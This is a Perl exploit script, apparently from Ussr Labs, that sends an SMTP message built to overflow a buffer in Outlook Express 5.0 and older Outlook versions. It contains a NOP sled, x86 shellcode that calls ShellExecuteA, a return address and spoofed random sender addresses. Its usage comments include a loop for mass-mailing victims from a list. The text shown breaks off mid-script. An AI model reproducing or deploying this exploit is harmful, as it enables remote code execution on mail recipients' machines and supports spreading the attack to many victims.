#!/usr/bin/perl #****************************************************************************** #http://www.ussrback.com Ussr Labs (Exploiteable Buffer Overflow) # Outlook Express 5.0 | Outlook 2000 | Outlook 97.0 | Outlook 98 #****************************************************************************** # # By: Ussr Labs # # Arbitary shellcode injector over SMTP # ./$0 -h -m # ./dieoutlook.pl -h -m victim@address.com # # # #For Multiple email's Spanwn do something like this: # # for i in `cat emailshere.txt`; do perl ./outoutlook.pl -h smtpserverip -m $i; done # # # # use Getopt::Std; use Socket; getopt('h:m', \%args); # user defined variables if(defined($args{h})){$serv=$args{h}}else{&usage;} if(defined($args{m})){$rcpt=$args{m}}else{&usage;} # These are the escape characters which will cause the seg violation. # *nix didn't like the ascii interpretation, so we send the # characters in hex. # +,1 ,Ì ,^ ,Ð ,z ,­ ,x $spawn = "\x2b\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" . "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" . "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" . "\x31\x31\x31\x31\x31\x31\x31\x31\x5a\xdc\xae\x20\x78\x0d\x0a"; $shellcode = "\xE8\x00\x00\x00\x00\x5D\x81\xED\x40\x10\x40\x00\x81\xC4\x00" . "\x03\x00\x00\xB8\x38\x10\x00\x01\x8B\x00\x89\x85\x0B\x11\x40\x00" . "\x8C\xC8\xA8\x04\x75\x08\x8B\x85\x1F\x11\x40\x00\xEB\x06\x8B\x85" . "\x23\x11\x40\x00\x89\x85\x1F\x11\x40\x00\x8D\x8D\x42\x11\x40\x00" . "\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x0F\x11\x40\x00\x8D\x8D" . "\x53\x11\x40\x00\x51\xFF\x95\x0F\x11\x40\x00\x8D\x8D\x34\x11\x40" . "\x00\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x13\x11\x40\x00\x8B" . "\x85\x1F\x11\x40\x00\x8D\x8D\x27\x11\x40\x00\x51\x50\xFF\x95\x0B" . "\x11\x40\x00\x89\x85\x17\x11\x40\x00\x8D\x85\x1B\x11\x40\x00\x50" . "\x6A\x00\x6A\x00\x8D\x85\xE3\x10\x40\x00\x50\x6A\x00\x6A\x00\x8B" . "\x85\x17\x11\x40\x00\xFF\xD0\xEB\xFE\x60\xE8\x00\x00\x00\x00\x5D" . "\x81\xED\xE9\x10\x40\x00\x6A\x00\x6A\x00\x6A\x00\x8D\xB5\x5F\x11" . "\x40\x00\x56\x6A\x00\x6A\x00\xFF\x95\x13\x11\x40\x00\x61\xC2\x10" . "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" . "\x00\x00\x00\x00\x00\x00\x00\xF0\x77\x00\x00\xF7\xBF\x43\x72\x65" . "\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00\x53\x68\x65\x6C\x6C\x45" . "\x78\x65\x63\x75\x74\x65\x41\x00\x47\x65\x74\x4D\x6F\x64\x75\x6C" . "\x65\x48\x61\x6E\x64\x6C\x65\x41\x00\x73\x68\x65\x6C\x6C\x33\x32" . "\x2E\x64\x6C\x6C\x00\x77\x77\x77\x2E\x75\x73\x73\x72\x62\x61\x63" . "\x6B\x2E\x63\x6F\x6D\x00"; $ret = "00aedc5a"; # return address $nop = "\x90"; # x86 NOP $port = 25; # default 25 SMTP port $buffsize = "1348"; # buffer size $buffer .= $nop x 945; # load $buffer with 945 NOP then $shellcode $buffer .= $shellcode; # append shellcode to buffer $offset = (hex $ret); # return hex string to corresponding value $code = pack("N", $offset); # big-endian (long) network order while (length $buffer < $buffsize) { $buffer .= $code; } $buffer .= "\n\n"; print "$code\n"; # create random MAIL FROM field. format is: [ alphanumeric ] @ [ characters ] . [ domain ] $max=(int rand 15); @a=('a'..'z', '1'..'10'); for (1..$max) { $str .= $a[rand @a] } @a=('a'..'z'); for (1..$max) { $host .= $a[rand @a] } @dom = ('.com', '.net', '.org'); $rdom = $dom[ rand @dom ]; $rmail = $str . "@" . $host . $dom; print "random address set to: $rmail\n"; # random date method, format: Date: , 2000